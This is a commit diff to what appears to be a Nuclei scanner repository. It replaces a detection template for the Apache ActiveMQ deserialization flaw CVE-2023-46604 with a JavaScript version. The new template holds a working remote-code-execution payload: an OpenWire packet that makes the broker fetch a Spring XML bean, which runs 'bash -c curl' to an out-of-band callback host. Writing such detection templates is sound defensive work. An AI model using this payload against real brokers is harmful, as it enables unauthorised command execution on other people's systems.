Improved template for CVE-2023-46604 detection (#8807)
* Added JS based template for CVE-2023-46604 * removed less reliable templatepatch-1
Sandeep Singh
GitHub
parent
7cb786c648
commit
2768ab1b32
|
|
@ -0,0 +1,64 @@
|
|||
id: CVE-2023-46604
|
||||
|
||||
info:
|
||||
name: Apache ActiveMQ - Remote Code Execution
|
||||
author: Ice3man,Mzack9999,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
|
||||
Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
|
||||
reference:
|
||||
- http://www.openwall.com/lists/oss-security/2023/10/27/5
|
||||
- https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
|
||||
- https://github.com/X1r0z/ActiveMQ-RCE
|
||||
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
|
||||
- https://paper.seebug.org/3058/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-46604
|
||||
cwe-id: CWE-502
|
||||
epss-score: 0.96805
|
||||
epss-percentile: 0.99601
|
||||
cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: apache
|
||||
product: activemq
|
||||
shodan-query: product:"ActiveMQ OpenWire Transport"
|
||||
tags: cve,cve2023,network,rce,apache,activemq,deserialization,kev
|
||||
|
||||
variables:
|
||||
prefix: "1f00000000000000000001010042"
|
||||
classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
|
||||
final: "{{prefix}}{{classname}}"
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
let m1 = require('nuclei/net');
|
||||
let m2 = require('nuclei/bytes');
|
||||
let b = m2.Buffer();
|
||||
let name=Host+':'+Port;
|
||||
let conn = m1.Open('tcp', name);
|
||||
let oob='{{interactsh-url}}'
|
||||
let randomvar = '{{randstr}}'
|
||||
var Base64={encode: btoa}
|
||||
exploit_xml='http://{{interactsh-url}}/b64_body:'+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
|
||||
packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
|
||||
packet+=(exploit_xml.length).toString(16)
|
||||
packet+=(b.WriteString(exploit_xml)).Hex()
|
||||
conn.SendHex(packet);
|
||||
resp = conn.RecvString()
|
||||
randomvar
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "61616"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(interactsh_protocol, "dns")'
|
||||
- 'contains(interactsh_request, response)'
|
||||
condition: and
|
||||
|
|
@ -1,52 +0,0 @@
|
|||
id: CVE-2023-46604
|
||||
|
||||
info:
|
||||
name: Apache ActiveMQ - Remote Code Execution
|
||||
author: Ice3man,Mzack9999,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
|
||||
Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
|
||||
reference:
|
||||
- http://www.openwall.com/lists/oss-security/2023/10/27/5
|
||||
- https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
|
||||
- https://github.com/X1r0z/ActiveMQ-RCE
|
||||
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
|
||||
- https://paper.seebug.org/3058/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2023-46604
|
||||
cwe-id: CWE-502
|
||||
epss-score: 0.00053
|
||||
metadata:
|
||||
max-request: 1
|
||||
shodan-query: product:"ActiveMQ OpenWire Transport"
|
||||
verified: true
|
||||
tags: cve,cve2023,network,rce,apache,activemq,deserialization
|
||||
|
||||
variables:
|
||||
prefix: "1f00000000000000000001010042"
|
||||
classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
|
||||
final: "{{prefix}}{{classname}}"
|
||||
|
||||
tcp:
|
||||
- inputs:
|
||||
- data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}"
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
port: 61616
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "ActiveMQ"
|
||||
- "StackTraceEnabled"
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100f363443cf43dcc6cfff466d9b2f2606a19f6366bf864994566b83a1b1a62b524022100886785b126a725f1ea5ff4295d1d61cfc9767f17a1a5de7d28c16744f15d1bfe:922c64590222798bb761d5b6d8e72950
|
||||
Loading…
Reference in New Issue